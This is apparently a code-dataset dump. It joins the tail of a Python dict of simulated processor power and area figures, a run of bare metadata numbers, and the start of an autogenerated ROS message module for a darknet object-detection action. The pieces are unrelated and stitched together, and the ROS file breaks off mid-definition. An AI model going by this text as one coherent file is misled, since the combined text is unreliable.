'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.06049,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000189419,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000189419,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000165268,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 6.41336e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000291182,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000835288,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00180597,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0194862,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.23949,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0535352,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0661838,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.51816,
'Instruction Fetch Unit/Runtime Dynamic': 0.141846,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0430708,
'L2/Runtime Dynamic': 0.0119442,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.01377,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.39345,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0251266,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0251265,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.13243,
'Load Store Unit/Runtime Dynamic': 0.542492,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.061958,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.123916,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0219891,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0226268,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.077067,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00880337,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.270949,
'Memory Management Unit/Runtime Dynamic': 0.0314302,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.7251,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0670636,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0037643,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0323038,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.103132,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.89134,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0267206,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.223676,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.135946,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.065922,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.10633,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0536717,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.225923,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.054553,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.17378,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0256832,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00276506,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0303382,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0204493,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0560214,
'Execution Unit/Register Files/Runtime Dynamic': 0.0232144,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0705957,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.186858,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.06505,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000185308,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000185308,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000161703,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 6.27614e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000293756,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000826076,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00176602,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0196585,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.25045,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0538894,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.066769,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.52965,
'Instruction Fetch Unit/Runtime Dynamic': 0.142909,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0448622,
'L2/Runtime Dynamic': 0.0125198,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.03051,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.40245,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0256681,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0256682,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.15172,
'Load Store Unit/Runtime Dynamic': 0.554705,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0632932,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.126587,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.022463,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0231278,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0777482,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00886089,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.272444,
'Memory Management Unit/Runtime Dynamic': 0.0319887,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.7619,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0675603,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00379641,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0326076,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.103964,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.91114,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 8.437790202507701,
'Runtime Dynamic': 8.437790202507701,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.377528,
'Runtime Dynamic': 0.14026,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 61.4145,
'Peak Power': 94.5267,
'Runtime Dynamic': 9.9394,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 61.037,
'Total Cores/Runtime Dynamic': 9.79914,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.377528,
'Total L3s/Runtime Dynamic': 0.14026,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.12035
| 124
| 0.682275
| 8,085
| 68,660
| 5.788126
| 0.067532
| 0.123427
| 0.112828
| 0.093339
| 0.938757
| 0.930273
| 0.917901
| 0.88745
| 0.862448
| 0.841742
| 0
| 0.132666
| 0.224163
| 68,660
| 914
| 125
| 75.12035
| 0.745837
| 0
| 0
| 0.642232
| 0
| 0
| 0.656923
| 0.048062
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3d88ae30b5927313a3fbd970dd4a5f973d6b45f
| 37,327
|
py
|
Python
|
ros/devel/lib/python2.7/dist-packages/darknet_ros_msgs/msg/_CheckForObjectsAction.py
|
wutianze/ComP
|
021440aa98aa03ee3b86ed3db196b95477b9f80b
|
[
"MIT"
] | 3
|
2021-08-20T03:25:37.000Z
|
2022-03-31T02:47:28.000Z
|
ros/devel/lib/python2.7/dist-packages/darknet_ros_msgs/msg/_CheckForObjectsAction.py
|
wutianze/ComP
|
021440aa98aa03ee3b86ed3db196b95477b9f80b
|
[
"MIT"
] | null | null | null |
ros/devel/lib/python2.7/dist-packages/darknet_ros_msgs/msg/_CheckForObjectsAction.py
|
wutianze/ComP
|
021440aa98aa03ee3b86ed3db196b95477b9f80b
|
[
"MIT"
] | null | null | null |
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from darknet_ros_msgs/CheckForObjectsAction.msg. Do not edit."""
import sys
# True when running under Python 3 (0x03000000 is the 3.0.0 base hexversion).
# Used by the serialization code below to decide when str values must be
# encoded to bytes. The comparison already yields a bool, so no ternary needed.
python3 = sys.hexversion > 0x03000000
import genpy
import struct
import darknet_ros_msgs.msg
import sensor_msgs.msg
import genpy
import actionlib_msgs.msg
import std_msgs.msg
class CheckForObjectsAction(genpy.Message):
_md5sum = "98095af4078a4c5df88f8e6a4db52e32"
_type = "darknet_ros_msgs/CheckForObjectsAction"
_has_header = False #flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
CheckForObjectsActionGoal action_goal
CheckForObjectsActionResult action_result
CheckForObjectsActionFeedback action_feedback
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsActionGoal
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalID goal_id
CheckForObjectsGoal goal
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
